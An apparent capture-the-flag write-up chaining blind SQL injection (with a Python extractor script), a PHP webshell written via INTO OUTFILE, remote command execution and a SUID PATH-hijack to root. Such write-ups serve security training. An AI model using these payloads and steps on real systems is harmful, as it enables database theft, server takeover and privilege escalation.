Overview
The challenge presented a login portal backed by MySQL. After initial recon we identified a classic boolean-based blind SQL injection in the username parameter. The real fun started when we found that secure_file_priv was not restricting writes, so INTO OUTFILE could drop files straight into the webroot (this also needs the FILE privilege, which the application's database account turned out to have).
Enumeration
Starting with a basic tautology payload to confirm the parameter is injectable:
' OR 1=1-- -
A different response confirmed the injection. With no query output reflected in the page, enumeration is boolean-based: ask one yes/no question per request, starting with the first character of the database version:
' AND SUBSTRING(VERSION(),1,1)='5'-- -
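Comparing one literal character per request gets slow, so in practice the probe is automated. The script below is an added example, not code from the original writeup: it builds the same kind of username payload (ASCII(SUBSTRING(...)) against a threshold) and binary-searches each byte, which takes 7 requests per character instead of one request per candidate. It assumes a hypothetical oracle callable that sends a payload to the login form and returns True when the page shows the TRUE-branch response; the mock oracle, the version string and the secure_file_priv value in it are constructed for the demo so it runs offline. The same extractor pulls @@secure_file_priv, which is the check worth doing before attempting the INTO OUTFILE write later in the writeup.

```python
import re
from typing import Callable, Dict

# Hypothetical oracle: send one username payload, return True when the page
# shows the TRUE-branch response (the behaviour seen for ' OR 1=1-- -).
Oracle = Callable[[str], bool]


def payload(expr: str, pos: int, threshold: int) -> str:
    """Username-field payload that is TRUE iff byte `pos` of `expr` is > `threshold`.

    MySQL returns '' for SUBSTRING past the end and ASCII('') is 0, so a
    recovered byte of 0 marks the end of the string.
    """
    return f"' AND ASCII(SUBSTRING(({expr}),{pos},1))>{threshold}-- -"


def extract(expr: str, oracle: Oracle, max_len: int = 128) -> str:
    """Recover `expr` one byte at a time, binary-searching 0..127 (7 requests per byte)."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = -1, 127                 # invariant: lo < byte <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(payload(expr, pos, mid)):
                lo = mid                 # byte > mid
            else:
                hi = mid                 # byte <= mid
        if hi == 0:                      # ASCII('') == 0: past the end of the value
            break
        out.append(chr(hi))
    return "".join(out)


def count_requests(expr: str, oracle: Oracle) -> int:
    """Number of oracle calls extract() needs: 7 per byte plus 7 for the terminator."""
    n = 0

    def counting(inj: str) -> bool:
        nonlocal n
        n += 1
        return oracle(inj)

    extract(expr, counting)
    return n


# Constructed stand-in for the vulnerable login page: it parses the injected
# condition and answers it from a fixed table. The values are made up for the
# example and exist only so the script runs offline.
SAMPLE_DB: Dict[str, str] = {
    "VERSION()": "5.7.42-0ubuntu0.18.04.1",
    "@@secure_file_priv": "",            # empty string: INTO OUTFILE may write anywhere
}
_COND = re.compile(r"ASCII\(SUBSTRING\(\((.+?)\),(\d+),1\)\)>(\d+)")


def mock_oracle(inj: str) -> bool:
    m = _COND.search(inj)
    if m is None:
        return False                     # unparsed payload: behave like the FALSE branch
    expr, pos, thr = m.group(1), int(m.group(2)), int(m.group(3))
    value = SAMPLE_DB[expr]
    byte = ord(value[pos - 1]) if pos <= len(value) else 0
    return byte > thr


if __name__ == "__main__":
    for expr in SAMPLE_DB:
        print(f"{expr} = {extract(expr, mock_oracle)!r} "
              f"({count_requests(expr, mock_oracle)} requests)")
```

One caveat when reading the secure_file_priv result: an empty string means unrestricted writes, but if the variable is NULL (file operations disabled entirely) every comparison evaluates to NULL, the oracle returns False for every threshold, and extract() also comes back empty. Probe that case separately with a payload such as ' AND @@secure_file_priv IS NULL-- - before concluding the write will work.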
Exploitation
With file write confirmed, we dropped a PHP webshell with INTO OUTFILE. The UNION has to match the column count of the original login query, which here was a single column, and the output path must be writable by the mysqld process and served by the web server:
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
Then triggered RCE:
curl "http://target/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
Privilege Escalation
From there, a quick SUID binary enum:
find / -perm -4000 -type f 2>/dev/null
Found a custom SUID-root binary at /opt/checker. Running strings over it showed a call to system("cat /flag") with an unqualified command name, so the shell spawned by system() resolves cat through PATH: a classic PATH hijack.
export PATH=/tmp:$PATH
printf '#!/bin/bash -p\ncat /root/flag.txt\n' > /tmp/cat
chmod +x /tmp/cat
/opt/checker
Two details matter here. printf is used instead of echo because bash's builtin echo does not expand \n without -e, which would leave the shebang and the command on one line and the script would not execute. The -p flag keeps bash from dropping the effective UID back to the real UID when the interpreter starts, which it does by default when the two differ; if the binary calls setuid(0) before system() the flag is unnecessary, but it costs nothing.
Flag captured.